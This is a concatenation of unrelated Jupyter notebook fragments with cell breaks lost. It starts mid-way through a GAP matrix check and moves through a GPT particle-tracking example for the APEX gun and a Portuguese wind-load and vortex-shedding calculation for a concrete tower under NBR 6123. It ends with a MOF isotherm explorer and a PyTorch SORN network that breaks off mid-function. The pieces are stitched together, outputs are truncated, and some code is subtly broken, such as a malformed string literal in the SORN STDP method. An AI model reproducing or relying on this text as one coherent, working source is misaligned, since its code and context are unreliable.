], [ 0, 0, -1, 1 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, -1 ], [ 0, 1, 0, -1 ], [ 0, 0, 1, 0 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, -1 ], [ 0, 1, 0, -1 ], [ 0, [...]Finally, we verify that $uv = vu = 1$:w:=u*v;;Print(w); w=e; w:=v*u;;Print(w);(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, 0 ], [ 0, 0, 0, 1 ] ]Instead of comparing with `e`, could also use `IsOne`:IsOne(w);APEX Gun examplefrom gpt import GPT from distgen import Generator import os GPT_IN = 'templates/apex_gun/gpt.in' DISTGEN_IN = 'templates/apex_gun/distgen.yaml' gen = Generator(DISTGEN_IN) 
gen['n_particle'] = 1000 gen.run() P0 = gen.particles factor = 2 #P0.x *= factor #P0.y *= 1/factor P0.plot('x', 'y') from gpt import run_gpt_with_distgen settings = {'n_particle':100, 'gun_peak_field':20e6, 'gun_relative_phase':0, 'BSOL':0.075, 'tmax': 5e-9, 'RadiusMax':.015, 'Ntout':2000, 'dtmin':0, 'GBacc':6.5, 'xacc':6.5, 'space_charge':1} G = run_gpt_with_distgen(settings, gpt_input_file=GPT_IN, distgen_input_file=DISTGEN_IN, auto_phase=True, verbose=True) G.plot('sigma_x') G.plot('mean_kinetic_energy') G.particles[-1] G.plot()Plot trajectoriesG.particles[0]._settable_array_keys import numpy as np from matplotlib import pyplot as plt # Make trajectory structure here for now, should go somewhere else as a function rs ={} for t in G.particles: for ID in t['id']: idint=int(ID) res = np.where(t['id']==ID) index = res[0][0] if(ID not in rs.keys()): rs[idint]={'x':[],'y':[],'z':[], 't':[], 'GBz':[]} else: rs[idint]['x'].append(t['x'][index]) rs[idint]['y'].append(t['y'][index]) rs[idint]['z'].append(t['z'][index]) rs[idint]['t'].append(t['t'][index]) # rs[idint]['GBz'].append(t['GBz'][index]) for ind in rs.keys(): for var in rs[ind]: rs[ind][var]=np.array(rs[ind][var]) for ind in rs.keys(): plt.plot(rs[ind]['z'][0],rs[ind]['x'][0]*1e2, color='red', marker='o') plt.plot(rs[ind]['z'],rs[ind]['x']*1e2, color='black', alpha=0.1) plt.ylim(-1.5, 1.5) plt.xlim(0, 0.1) plt.title('GPT tracking') plt.xlabel('z (m)'); plt.ylabel('x (cm)'); zlist = np.array([P['mean_z'] for P in G.particles]) np.argmin(abs(zlist - 0.15)) G.particles[3]['mean_z'] #G.particles[3].write('$HOME/Scratch/gpt_apex_100pC_4x.h5') G.archive('gpt_apex_gun.h5') G2 = GPT() G2.load_archive('gpt_apex_gun.h5') G2.particles[3]['mean_z'] G.tout plt.plot(np.array([P['n_particle'] for P in G.particles]))1. Cálculo pelo processo convencionalOs dados da torre fornecidos para o problema são:\begin{align}\gamma_{concreto} &= 2500 kg/m^3\\F_{ck} &= 30MPa\end{align}![dados.PNG](attachment:dados.PNG)A_F = np.pi*(5**2 - 4.6**2)/4 A_L = np.pi*(10**2)/4 mi_F = A_F * 2500 m_L = 5* A_L *0.2*2500 print(" Massa por comprimento do fuste:{0:5.3f}kg/m.".format(mi_F)) print(" Massa das 5 lajes :{0:5.3f}kg.".format(m_L))Massa por comprimento do fuste:7539.822kg/m. Massa das 5 lajes :196349.541kg.As características do vento estão expostas abaixo:Vo = 46 ## Velocidade básica do vento S1 = 1.0 ## Fator topográfico S3 = 1.0 ## Fator estatístico ## Para categoria III e classe C. 
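## S2 below follows NBR 6123: S2 = b * Fr * (z/10)**p, with gust factor Fr = 0.95 for class C;
## b and p are the roughness-category/class parameters set in the next lines.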
b = 0.93 p = 0.115 ################################ z = [4,12.5,21.5,30.5,39.5,46,50,54,58] ## discretização da altura da torre S2 = np.zeros(len(z)) for i in range (len(z)): S2[i] = b*0.95*(z[i]/10)**p Vk = S1*S2*S3*Vo ## Velocidade característica em cada alturaPara o cálculo dos esforços que atuarão na torre, é necessário a definição dos coeficientes de arrasto $C_a$( Tabela 10 da NBR 6123/88):C_F = 0.5 ## Coeficiente de arrasto do fuste C_K = 0.5 ## Coeficiente de arrasto do Kevlar Ca = np.ones(9)* C_FO cálculo da pressão dinâmica e da força de arrasto serão calculados, respectivamente, pelas seguintes equações:$${q} = 0.613 * V_k^2 \\$$$$ F_a = C_a * q * A $$q = 0.613*Vk**2 A = [41.25,45,45,45,45,40,40,40,40] F1 = Ca*q*A M1 = F1*z data = {'Vk (m/s)':Vk[::-1],'S2': S2[::-1],'A (m^2)':A[::-1], 'q (kPa)':q[::-1]/1000,'Ca':Ca[::-1],'F (kN)':F1[::-1]/1000,'M (kN.m)':M1[::-1]/1000} Plan = pd.DataFrame( data = data, index = z[::-1]) print(Plan)Vk (m/s) S2 A (m^2) q (kPa) Ca F (kN) M (kN.m) 58.0 49.746050 1.081436 40.00 1.516972 0.5 30.339448 1759.688004 54.0 49.338923 1.072585 40.00 1.492244 0.5 29.844878 1611.623405 50.0 48.904175 1.063134 40.00 1.466062 0.5 29.321241 1466.062032 46.0 48.437480 1.052989 40.00 1.438214 0.5 28.764282 1323.156986 39.5 47.596284 1.034702 45.00 1.388694 0.5 31.245616 1234.201845 30.5 46.201797 1.004387 45.00 1.308514 0.5 29.441554 897.967391 21.5 44.380767 0.964799 45.00 1.207397 0.5 27.166432 584.078297 12.5 41.697406 0.906465 45.00 1.065807 0.5 23.980656 299.758205 4.0 36.576427 0.795140 41.25 0.820093 0.5 16.914416 67.657663O somatório dos esforços são:print('Esforço cortante ={0:5.3f}N'.format(np.sum(F1))) print('Mommento fletor ={0:5.3f}N.m'.format(np.sum(M1)))Esforço cortante =247018.524N Mommento fletor =9244193.828N.m2. Solução pelo capítulo 9 da NBR6123/88 1. Método simplificadoPara a velocidade média do vento, utiliza-se a seguinte expressão:$$ V_k = 0.69*V_o*S1*S2 $$Para uma chaminé de concreto com razão uniforme (Tabela 19), tem-se:$$ \\ expoente\,da\,Forma \,modal = 1.7\\ $$$$Razão\, de \,amortecimento = 0.010 \\$$$$Frequência\, fundamental= 1.11 Hz$$Já a pressão dinâmica pode ser expressa por:$$ q = \overline{q_o}*b^2 \left[ \left( \frac{z}{z_r} \right) ^{2p}+\left(\frac{h}{z_r} \right) ^{p}*\left(\frac{z}{h} \right) ^{\gamma} *\frac{1+2*\gamma}{1+\gamma+p}*\xi\right]$$$$ \overline{q_o} = 0.613 * V_k^2 $$Pela interpolação linear da Figura 16, $ \xi = 1.50$ e pela tabela 20, tem-se que $ b = 0.86$ e $p = 0.185$Vk = S1*0.69*S3*Vo q = 0.613*Vk**2 q_d = np.zeros(9) for n in range (9): q_d[n] = q *0.86**2 *((z[n]/10)**(2*0.185) + (60/10)**0.185 *(z[n]/60)**1.7 * (1+2*1.7)*1.5/(1+1.7+0.185)) F2 = Ca*q_d*A M2 = F2*zMontando agora a tabela para o cálculo dos esforços:data = {'Vk (m/s)':Vk,'A (m^2)':A[::-1], 'q (kPa)':q_d[::-1]/1000,'Ca':Ca[::-1],'F (kN)':F2[::-1]/1000,'M (kN.m)':M2[::-1]/1000} Plan = pd.DataFrame( data = data, index = z[::-1]) print(Plan) print('Esforço cortante ={0:5.3f}N'.format(np.sum(F2))) print('Mommento fletor ={0:5.3f}N.m'.format(np.sum(M2)))Esforço cortante =257770.233N Mommento fletor =11044032.447N.m2. 
Método discreto![Discreto.PNG](attachment:Discreto.PNG)O capítulo 9 da norma estabelece o seguinte roteiro para a análise dinâmica$$ x_i = \left(\frac{z_i}{h}\right)^\gamma\\ $$$$ X_i = \overline{X_i} + \hat{X_i}\\ $$$$ \overline{X_i} = \overline{q_o}*b^2*C_{ai}*A_i*\left(\frac{z_i}{z_r}\right)^{2p}\\ $$$$ \hat{x_i} = FH *\phi_i* x_i\\ $$$$ \phi_i = \frac{m_i}{m_o}\\ $$$$ FH = \overline{q_o}*b^2*C_i*A_O* \frac{\sum_{n=1}^{n}\beta_i * x_i}{\sum_{n=1}^{n}\phi_i * x_i^2}*\xi\\ $$$$ A_o = \sum A_i \\ $$$$ m_o = \sum m_i \\ $$$$ \beta_i = C_{ai} * \frac{A_i}{A_o} \left( \frac{z_i}{z_r}\right)^p $$Onde $x_i$ é a forma modal, $X_i$ é a velocidade instantânea do vento, $\overline{X_i}$ é a velocidade média e $\hat{X_i}$ é a velocidade flutuante.xi = np.zeros(9) Xi_m = np.zeros(9) beta =np.zeros(9) mi = [24543.75, 34361.25, 35343,35343, 31346, 89559.5, 55779.3,55779.3, 75814.95] phi = np.zeros(9) for i in range(9): xi[i] = (z[i]/60)**1.7 beta[i] = 0.5* A[i]/sum(A)*(z[i]/10)**0.185 Xi_m[i] = q *0.86**2 * 0.5 * A[i] * (z[i]/10)**(2*0.185) phi[i] = mi[i]/sum(mi) FH = q * 0.86**2 * 0.5 * np.sum(A)*np.sum(beta*xi)/sum(phi*xi**2) * 1.5 xi_f = FH * phi * xi Xi = Xi_m + xi_f M3 = (Xi)*z data = {'A (m^2)':A[::-1],'m(kg)':mi[::-1],'beta':beta[::-1], 'phi':phi[::-1],'x': xi[::-1],'FH':FH,'X médio (kN)':Xi_m[::-1]/1000, 'x_f (kN)':xi_f[::-1]/1000,'Xi (kN)':Xi[::-1]/1000,'M (kN.m)':M3[::-1]/1000} Plan = pd.DataFrame( data = data, index = z[::-1]) print(Plan)A (m^2) m(kg) beta phi x FH \ 58.0 40.00 75814.95 0.072620 0.173145 0.943997 93106.752898 54.0 40.00 55779.30 0.071666 0.127388 0.836012 93106.752898 50.0 40.00 55779.30 0.070653 0.127388 0.733486 93106.752898 46.0 40.00 89559.50 0.069571 0.204534 0.636548 93106.752898 39.5 45.00 31346.00 0.076093 0.071587 0.491313 93106.752898 30.5 45.00 35343.00 0.072538 0.080716 0.316557 93106.752898 21.5 45.00 35343.00 0.067994 0.080716 0.174698 93106.752898 12.5 45.00 34361.25 0.061504 0.078474 0.069485 93106.752898 4.0 41.25 24543.75 0.045663 0.056053 0.010015 93106.752898 X médio (kN) x_f (kN) Xi (kN) M (kN.m) 58.0 17.505301 15.218129 32.723430 1897.958912 54.0 17.048529 9.915652 26.964181 1456.065753 50.0 16.569909 8.699632 25.269541 1263.477041 46.0 16.066512 12.122126 28.188638 1296.677363 39.5 [...]Portanto, os esforços na base são:print('Esforço cortante ={0:5.3f}N'.format(np.sum(Xi))) print('Mommento fletor ={0:5.3f}N.m'.format(np.sum(M3)))Esforço cortante =184796.132N Mommento fletor =7758874.472N.mComparando os valores obtidos por cada método disponível na NBR 6123\88, monta-se a seguinte tabela:data =[np.sum(F1)/1000,np.sum(M1)/1000,np.sum(F2)/1000,np.sum(M2)/1000,np.sum(Xi)/1000,np.sum(M3)/1000] comp = pd.DataFrame( data = data, index = ['Força convencional','Momento convecional','Força simplificada', 'Momento simplificado', 'Força discreta','Momento discreto'], columns = ['Valores']) print(comp)Valores Força convencional 247.018524 Momento convecional 9244.193828 Força simplificada 257.770233 Momento simplificado 11044.032447 Força discreta 184.796132 Momento discreto 7758.8744723. 
Desprendimento de vórtices pela norma canadenseA principio, deve-se calcular a velocidade crítica, que consiste na velocidade do vento em que a estrutura entrará em ressonância com as forças transversais.$$ V_{cr} = \frac{1}{S_t}*f*d $$Onde $S_t$ é o número de Strouhal, que pode apresentar os seguintes valores:$$ S_t = 0.2,\, 10^3 \leq R_e \leq 2 *10^6$$$$ S_t = 0.28,\, R_e \geq 2 *10^6$$O cálculo das características da torre, como módulo de elasticidade, momento de inércia e Rigidez estão apresentados abaixo:E = 6600*(30+3.5)**0.5 I = 0.25 * np.pi * (2.5**4 - 2.3**4) K = 3* E*I/(60**3)*10**6 print(' Módulo de elasticidade: {0:5.3f}MPa'.format(E),'\n', 'Momento de inércia: {0:5.3f}m^4'.format(I),'\n', 'Rigidez à flexão: {0:5.3f}N/m'.format(K))Módulo de elasticidade: 38200.262MPa Momento de inércia: 8.701m^4 Rigidez à flexão: 4616371.656N/mCalculando, agora, as frequências naturais da torre e da massa concentrada (Lajes) em cima dela, por meio das equações: ![freq.png](attachment:freq.png) Para a massa concentrada$$f = \frac{1}{2\pi}\sqrt{\frac{K}{m}}$$ Para a massa Distribuída$$f = \frac{3.52}{2\pi}\sqrt{\frac{EI}{ML^4}}$$ Tendo estes dois valores, é possível estimar a frequência natural da torre junto da massa, por meio da equação:$$ \frac{1}{f_n^2} = \frac{1}{f_1^2}+\frac{1}{f_2^2}$$f1 = 1/(2*np.pi)*np.sqrt(K/m_L) f2 = 3.52/(2*np.pi)*np.sqrt(E*10**6*I/(mi_F*60**4)) inv_fn = 1/(f1**2) + 1/(f2**2) fn = (1/inv_fn)**0.5 print(' Frequência das lajes: {0:5.3f}Hz'.format(f1),'\n', 'Freqência do fuste: {0:5.3f}Hz'.format(f2),'\n', 'Frequência da torre: {0:5.3f}Hz'.format(fn))Frequência das lajes: 0.772Hz Freqência do fuste: 1.033Hz Frequência da torre: 0.618HzCom o valor do número de Reynolds obtido nos itens anteriores, o número de Strouhal é o Seguinte:$$ S_t = 0.2$$ Calculando agora a velocidade crítica para os dois diâmetros da torre:v1 = 1/0.2 * fn * 5 v2 = 1/0.2 * fn * 10 print(' Velocidade crítica no fuste: {0:5.3f}m/s'.format(v1),'\n', 'Velocidade crítica no Kevlar: {0:5.3f}m/s'.format(v2))Velocidade crítica no fuste: 15.457m/s Velocidade crítica no Kevlar: 30.915m/sComo a velocidade de projeto é maior que as velocidades críticas, pode ocorrer desprendimento de vórtices. Os efeitos dinâmicos do desprendimento de vórtices podem ser aproximados por uma força estática lateral, atuando no terçosuperior, aplicada no ponto de máximo deslocamento da forma modal considerada. A força estática equivalente por unidade de altura, FL, é dada por:$$ F_L = \frac{C1}{\sqrt{\lambda}\sqrt{\beta- C_2 \frac{\rho D^2}{M}}}q_HD $$ Onde $\beta$ é o amortecimento em razão do crítico (0.010), $\lambda$ é a relação H/D, H é a altura da estrutura, $q_H$ é a pressão dinâmica correspondente a velocidade crítica( $q_H= 0.6*V_C^2$), M é a massa por unidade de altura do terço superior e $\rho$ é a densidade do ar(1.2 kg/m^3). 
Para a maioria dos casos:$$C_1 = \frac{3\sqrt{\lambda}}{4}$$ Os cálculos abaixo são referentes a determinação da força transversal equivalente que atuará na estrutura.rho = 1.2 lam = 60/5 C1 = 3*lam**0.5/4 C2 = 0.6 M_3 = ((60*mi_F)/3 + m_L)/(60/3) qh1 = 0.6 * v1**2 qh2 = 0.6 * v2**2 FL1 = C1/((lam**0.5) * (0.01-C2*1.2*5**2/M_3)**0.5) * qh1 *5 FL2 = C1/((lam**0.5) * (0.01- C2*1.2*10**2/M_3)**0.5) * qh2 *10 print(' λ: {0:5.3f}'.format(lam),'\n', ' C1: {0:5.3f}'.format(C1),'\n', ' C2: {0:5.3f}'.format(C2),'\n', ' Massa do terço final: {0:5.3f}kg/m'.format(M_3),'\n', ' Pressão dinâmica no Fuste: {0:5.3f}N/m²'.format(qh1),'\n', ' Pressão dinâmica no Kevlar: {0:5.3f}N/m²'.format(qh2),'\n', ' Força lateral no fuste: {0:5.3f}kN/m'.format(FL1/1000),'\n', ' Força lateral no Kevlar: {0:5.3f}kN/m'.format(FL2/1000))λ: 12.000 C1: 2.598 C2: 0.600 Massa do terço final: 17357.299kg/m Pressão dinâmica no Fuste: 143.356N/m² Pressão dinâmica no Kevlar: 573.425N/m² Força lateral no fuste: 5.678kN/m Força lateral no Kevlar: 56.220kN/mSe a seguinte relação for satisfeita, não haverá oscilações acima de um diâmetro:$$ \beta < C2\frac{\rho D^2}{M} $$beta = 0.01 X1 = C2*rho*5**2/M_3 X2 = C2*rho*10**2/M_3 print(' beta: {0:5.3f}'.format(beta),'\n', 'Fuste: {0:5.7f}'.format(X1),'\n', 'Kevlar: {0:5.7f}'.format(X2))beta: 0.010 Fuste: 0.0010370 Kevlar: 0.0041481Portanto, não ocorrerá deslocamentos superiores a um diâmetro.O cálculo dos esforços na base estão expostos a seguir:V1 = FL1 * 60 V2 = FL2 * 16 V = V1 + V2 M = V * 50 print(' Força adicional na base: {0:5.3f}kN'.format(V/1000),'\n', 'Momento fletor adicional na base: {0:5.3f}kN.m'.format(M/1000))Força adicional na base: 1240.218kN Momento fletor adicional na base: 62010.905kN.mExplorerimport pickle import yaml with open("data/nistdb.pickle", 'rb') as f: nistdb = pickle.load(f) with open("data/step-12-geometric.yml") as f: pv = yaml.safe_load(f) pv['CuBTC'] # Get all the isotherms from valid DOIs # i.e., containing characterization isotherms for which the MPV/CPV ratio is in a certain threshold MOF = 'CuBTC' MIN_THR_RATIO = 0.75 MAX_THR_RATIO = 1.10 max_pv_from_structure = max(pv[MOF]['structures'].values()) valid_dois = [ isot.split(".iso")[0] for isot, mpv in pv[MOF]['isotherms'].items() if MIN_THR_RATIOCuBTC Nitrogen 77 10.1016j.micromeso.2011.12.053.isotherm3 CuBTC Nitrogen 77 10.1007s10934-013-9692-4.isotherm1 CuBTC Nitrogen 77 10.1021acs.iecr.6b00774.Isotherm1 CuBTC Nitrogen 77 10.1021acs.iecr.6b00774.Isotherm2 CuBTC Nitrogen 77 10.1016j.talanta.2015.02.032.Isotherm1 CuBTC Nitrogen 77 10.1039c5ce00938c.Isotherm1 CuBTC Nitrogen 77 10.1016j.jcat.2014.07.010.Isotherm15 CuBTC Nitrogen 77 10.1016j.micromeso.2012.06.011.isotherm1 CuBTC Nitrogen 77 10.1021Jp207411b.isotherm2 CuBTC Hydrogen 323 10.1021Jp207411b.isotherm10 CuBTC Hydrogen 323 10.1021Jp207411b.isotherm9 CuBTC Hydrogen 298 10.1021Jp207411b.isotherm6 CuBTC Hydrogen 298 10.1021Jp207411b.isotherm5 CuBTC Hydrogen 298 10.1021Jp207411b.isotherm4 CuBTC Hydrogen 323 10.1021Jp207411b.isotherm8 CuBTC Hydrogen 298 10.1021Jp207411b.isotherm7 CuBTC Hydrogen 77 10.1021Jp207411b.isotherm3 CuBTC Hydrogen 323 10.1021Jp207411b.isotherm11 CuBTC Nitrogen 77 10.1021Jp207411b.isotherm1 CuBTC Nitrogen 77 10.1016j.catcom.2013.04.019.isotherm1 CuBTC [...]IMPORT LIBRARIESfrom __future__ import division import numpy as np from scipy.stats import norm import random import tqdm import pandas as pd from collections import OrderedDict import matplotlib.pyplot as plt import heapq import pickle import torch import torch.distributions 
as tdist # Define the default tensor type at the top # torch.set_default_tensor_type(torch.cuda.FloatTensor if torch.cuda.is_available() # else torch.FloatTensor) torch.set_default_tensor_type('torch.DoubleTensor') torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')VERIFY INSTALLED TORCH VERSION AND AVAILABLE GPU DEVICEtorch.__version__ print('Number of available devices:',torch.cuda.device_count()) print('Current device:',torch.cuda.current_device()) print('Current device name:', torch.cuda.get_device_name(torch.cuda.current_device())) ### Set all tensors as DoubleTensor by default # torch.set_default_tensor_type('torch.DoubleTensor') # As recommended by Pytorch Devs: use float32 instead of double ### WHITE GAUSSIAN NOISE GENERATOR def white_gaussian_noise(mu, sigma,t): """Generates white gaussian noise with mean mu, standard deviation sigma and the noise length equals t """ n = tdist.Normal(mu, sigma) noise = n.sample((t,)) return noiseUTIL FUNCTION TO GENERATE LAMBDA CONNECTION MATRICES Util function is called only during initialization; Doesnt require GPU support Written using Numpy# Implement lambda incoming and outgoing connections per neuron def generate_lambd_connections(synaptic_connection,ne,ni, lambd_w,lambd_std): if synaptic_connection == 'EE': """Choose random lamda connections per neuron""" # Draw normally distribued ne integers with mean lambd_w lambdas_incoming = norm.ppf(np.random.random(ne), loc=lambd_w*2 + 0.5, scale=lambd_std).astype(int) # lambdas_outgoing = norm.ppf(np.random.random(ne), loc=lambd_w, scale=lambd_std).astype(int) # List of neurons list_neurons= list(range(ne)) # Connection weights connection_weights = np.zeros((ne,ne)) # For each lambd value in the above list, # Choose the neurons in order [0 to 199] for neuron in list_neurons: ### Choose ramdom unique (lambdas[neuron]) neurons from list_neurons possible_connections = list_neurons.copy() possible_connections.remove(neuron) # Remove the selected neuron from possible connections i!=j possible_incoming_connections = random.sample(possible_connections,lambdas_incoming[neuron]) # Generate weights for incoming and outgoing connections # Gaussian Distribution of weights # weight_matrix = np.random.randn(Sorn.ne, Sorn.ni) + 2 # Small random values from gaussian distribution # Centered around 2 to make all values positive # weight_matrix*=0.01 # Setting spectral radius # Uniform Distribution: Weights are drawn randomly from the interval [0,1] incoming_weights = np.random.uniform(0.0,0.1,lambdas_incoming[neuron]) # ---------- Update the connection weight matrix ------------ # Update incoming connection weights for selected 'neuron' for incoming_idx,incoming in enumerate(incoming_weights): # Update the rows connection_weights[possible_incoming_connections[incoming_idx]][neuron] = incoming_weights[incoming_idx] return connection_weights if synaptic_connection == 'EI': """Choose random lamda connections per neuron""" # Draw normally distribued ni integers with mean lambd_w lambdas = norm.ppf(np.random.random(ni), loc=lambd_w*2 + 1, scale=lambd_std).astype(int) # List of neurons list_neurons= list(range(ni)) # Each i can connect with random ne neurons # Connection weights connection_weights = np.zeros((ni,ne)) # For each lambd value in the above list, # Choose the neurons in order [0 to 40] for neuron in list_neurons: ### Choose ramdom unique (lambdas[neuron]) neurons from list_neurons possible_connections = list(range(ne)) # possible_connections.remove(neuron) # Remove the selected neuron from possible 
connections i!=j # possible_incoming_connections = random.sample(possible_connections,lambdas[neuron]) # possible_incoming connections to the slected neuron possible_outgoing_connections = random.sample(possible_connections,lambdas[neuron]) # possible_outgoing connections to the neuron # Generate weights for incoming and outgoing connections # Weights are drawn randomly from the interval [0,1] # incoming_weights = np.random.random(lambdas[neuron]) # Incomig connections are column in the connection_weights matrix outgoing_weights = np.random.uniform(0.0,0.1,lambdas[neuron]) # Outgoing connections are rows in the connection_weights matrix # ---------- Update the connection weight matrix ------------ # Update outgoing connections for the neuron for outgoing_idx,outgoing_weight in enumerate(outgoing_weights): # Update the columns in the connection matrix connection_weights[neuron][possible_outgoing_connections[outgoing_idx]] = outgoing_weight return connection_weightsSANITY CHECK EACH WEIGHTS### NOTE REQUIRED; REFER CPU CODESHELPER FUNCTION TO NORMALIZE INCOMING WEIGHTSdef normalize_weight_matrix(weight_matrix): # Applied only while initializing the weight. Later Synaptic scalling applied on weight matrices """ Normalize the weights in the matrix such that incoming connections to a neuron sum up to 1 Args: weight_matrix(array) -- Incoming Weights from W_ee or W_ei or W_ie Returns: weight_matrix(array) -- Normalized weight matrix""" normalized_weight_matrix = weight_matrix / np.sum(weight_matrix,axis = 0) return normalized_weight_matrixSORN INITIALIZING CLASS: Init all required matrices for the network simulation and analysis NOTE: This class is called only once and it has no influence during simulation Hence, it is just build with numpy. Later its matrices are converted into torchable tensors during simulationclass Sorn(object): """SORN 2 network model Initialization""" def __init__(self): pass """Initialize network variables as class variables of SORN""" nu = 10 # Number of input units ne = 200 # Number of excitatory units ni = int(0.2*ne) # Number of inhibitory units in the network eta_stdp = 0.004 eta_inhib = 0.001 eta_ip = 0.01 te_max = 1.0 ti_max = 0.5 ti_min = 0.0 te_min = 0.0 mu_ip = 0.1 sigma_ip = 0.0 # Standard deviation, variance == 0 # Initialize weight matrices def initialize_weight_matrix(self, network_type,synaptic_connection, self_connection, lambd_w): if (network_type == "Sparse") and (self_connection == "False"): """Generate weight matrix for E-E/ E-I connections with mean lamda incoming and outgiong connections per neuron""" weight_matrix = generate_lambd_connections(synaptic_connection,Sorn.ne,Sorn.ni,lambd_w,lambd_std = 1) # Dense matrix for W_ie elif (network_type == 'Dense') and (self_connection == 'False'): # Gaussian distribution of weights # weight_matrix = np.random.randn(Sorn.ne, Sorn.ni) + 2 # Small random values from gaussian distribution # Centered around 1 # weight_matrix.reshape(Sorn.ne, Sorn.ni) # weight_matrix *= 0.01 # Setting spectral radius # Uniform distribution of weights weight_matrix = np.random.uniform(0.0,0.1,(Sorn.ne, Sorn.ni)) weight_matrix.reshape((Sorn.ne,Sorn.ni)) return weight_matrix def initialize_threshold_matrix(self, te_min,te_max, ti_min,ti_max): # Initialize the threshold for excitatory and inhibitory neurons """Args: te_min(float) -- Min threshold value for excitatory units ti_min(float) -- Min threshold value for inhibitory units te_max(float) -- Max threshold value for excitatory units ti_max(float) -- Max threshold value for inhibitory 
units Returns: te(vector) -- Threshold values for excitatory units ti(vector) -- Threshold values for inhibitory units""" te = np.random.uniform(0., te_max, (Sorn.ne, 1)) ti = np.random.uniform(0., ti_max, (Sorn.ni, 1)) return te, ti def initialize_activity_vector(self,ne, ni): # Initialize the activity vectors X and Y for excitatory and inhibitory neurons """Args: ne(int) -- Number of excitatory neurons ni(int) -- Number of inhibitory neurons Returns: x(array) -- Array of activity vectors of excitatory population y(array) -- Array of activity vectors of inhibitory population""" x = np.zeros((ne, 2)) y = np.zeros((ni, 2)) return x, yINITIALIZE MATRICES# Create and initialize sorn object and varaibles sorn_init = Sorn() # Sorn instance only for matrix initialization WEE_init = sorn_init.initialize_weight_matrix(network_type='Sparse',synaptic_connection = 'EE', self_connection='False',lambd_w = 10) WEI_init = sorn_init.initialize_weight_matrix(network_type='Sparse',synaptic_connection = 'EI', self_connection='False',lambd_w = 20) WIE_init = sorn_init.initialize_weight_matrix(network_type='Dense',synaptic_connection = 'IE', self_connection='False',lambd_w = None) Wee_init = WEE_init.copy() Wei_init = WEI_init.copy() Wie_init = WIE_init.copy() c = np.count_nonzero(Wee_init) # Max: 39800; Target: 3980 v = np.count_nonzero(Wei_init) # Max: 8000; target : 1600 : b = np.count_nonzero(Wie_init) # Max: 8000; Target: 8000 print(c,v,b)4003 1617 8000NORMALIZE THE INCOMING WEIGHTS# Normaalize the incoming weights i.e sum(incoming weights to a neuron) = 1 wee_init = normalize_weight_matrix(Wee_init) wei_init = normalize_weight_matrix(Wei_init) wie_init = normalize_weight_matrix(Wie_init)Rest of the code needs to build in torch using available Cuda device Check CUDA device# use_cuda = torch.cuda.is_available() # True # n_gpus = torch.cuda.device_count() # 1Use the default GPU device for all variables defined as tensor float data types Note this feaature is added in Torch 0.4 version CONVERT INITIALIZED WEIGHT MATRICES INTO TORCHABLE TENSORSwee_init = torch.from_numpy(wee_init).cuda() wei_init = torch.from_numpy(wei_init).cuda() wie_init = torch.from_numpy(wie_init).cuda()INITIALIZE THRESHOLD AND ACTIVITY MATRICES AND CONVERT THEM INTO TENSORSte_init, ti_init = sorn_init.initialize_threshold_matrix(Sorn.te_min,Sorn.te_max,Sorn.ti_min,Sorn.ti_max) x_init, y_init = sorn_init.initialize_activity_vector(Sorn.ne, Sorn.ni) te_init,ti_init = torch.from_numpy(te_init),torch.from_numpy(ti_init).cuda() x_init,y_init = torch.from_numpy(x_init),torch.from_numpy(y_init).cuda()Helpers functions with GPU support# Helpers for Plasticity.stdp() def prune_small_weights(weights,cutoff_weight): """ Prune the connections with negative connection strength""" # No need to define tensor data types explicitly since default tensor types # are already set using the execution line above - From Torch version 0.4 weights[weights <= cutoff_weight] = cutoff_weight return weights def set_max_cutoff_weight(weights, cutoff_weight): """ Set cutoff limit for the values in given array""" weights[weights > cutoff_weight] = cutoff_weight return weights # Helper for Plasticity.ss() def get_unconnected_indexes(wee): """ Helper function for Structural plasticity to randomly select the unconnected units Args: wee - Weight matrix Returns: list (indices) // indices = (row_idx,col_idx)""" i,j = torch.where(wee <= 0.).cuda() indices = list(zip(i,j)) self_conn_removed = [] for i,idxs in enumerate(indices): if idxs[0] != idxs[1]: 
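# keep only off-diagonal pairs (i != j), i.e. exclude self-connections from the candidate list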
self_conn_removed.append(indices[i]) return self_conn_removedPLASTICITY CLASS (Child of Class SORN) written in torch ; Instances of this class will be called iteratively during simulationclass Plasticity(Sorn): """ Instance of class Sorn. Inherits the variables and functions defined in class Sorn Encapsulates all plasticity mechanisms mentioned in the article """ # Initialize the global variables for the class //Class attributes def __init__(self): super().__init__() self.nu = torch.Tensor([Sorn.nu]).cuda() # Number of input units self.ne = torch.Tensor([Sorn.ne]).cuda() # Number of excitatory units self.eta_stdp = torch.Tensor([Sorn.eta_stdp]).cuda() # Learning rate in other words self.eta_ip = torch.Tensor([Sorn.eta_ip]).cuda() self.eta_inhib = torch.Tensor([Sorn.eta_inhib]).cuda() self.h_ip = torch.Tensor([2]) * torch.Tensor([Sorn.nu]) / torch.Tensor([Sorn.ne]) self.mu_ip = torch.Tensor([Sorn.mu_ip]).cuda() self.ni = torch.Tensor([Sorn.ni]).cuda() self.time_steps = torch.Tensor([Sorn.time_steps]).cuda() self.te_min = torch.Tensor([Sorn.te_min]).cuda() self.te_max = torch.Tensor([Sorn.te_max]).cuda() def stdp(self, wee, x, cutoff_weights): """ Apply STDP rule : Regulates synaptic strength between the pre(Xj) and post(Xi) synaptic neurons""" xt_1 = x[:,0].unsqueeze(1) xt = x[:,1].unsqueeze(1) wee_t = wee.clone().cuda() # STDP applies only on the neurons which are connected. for i in range(len(wee_t[0])): # Each neuron i, Post-synaptic neuron for j in range(len(wee_t[0:])): # Incoming connection from jth pre-synaptic neuron to ith neuron if wee_t[j][i] != 0. : # Check connectivity # Get the change in weight delta_wee_t = self.eta_stdp * (xt[i] * xt_1[j] - xt_1[i]*xt[j]).cuda() # Update the weight between jth neuron to i ""Different from notation in article wee_t[j][i] = wee[j][i].cuda() + delta_wee_t.cuda() """ Prune the smallest weights induced by plasticity mechanisms; Apply lower cutoff weight""" wee_t = prune_small_weights(wee_t,cutoff_weights[0]) """Check and set all weights < upper cutoff weight """ wee_t = set_max_cutoff_weight(wee_t,cutoff_weights[1]) return wee_t def ip(self, te, x): # IP rule: Active unit increases its threshold and inactive decreases its threshold. xt = x[:, 1].unsqueeze(1) te_update = te.cuda() + self.eta_ip.cuda() * (xt.cuda() - self.h_ip.cuda()) """ Check whether all te are in range [0.0,1.0] and update acordingly""" # Update te < 0.0 ---> 0.0 # Would be nice to have separate function name for thresholds # te_update = 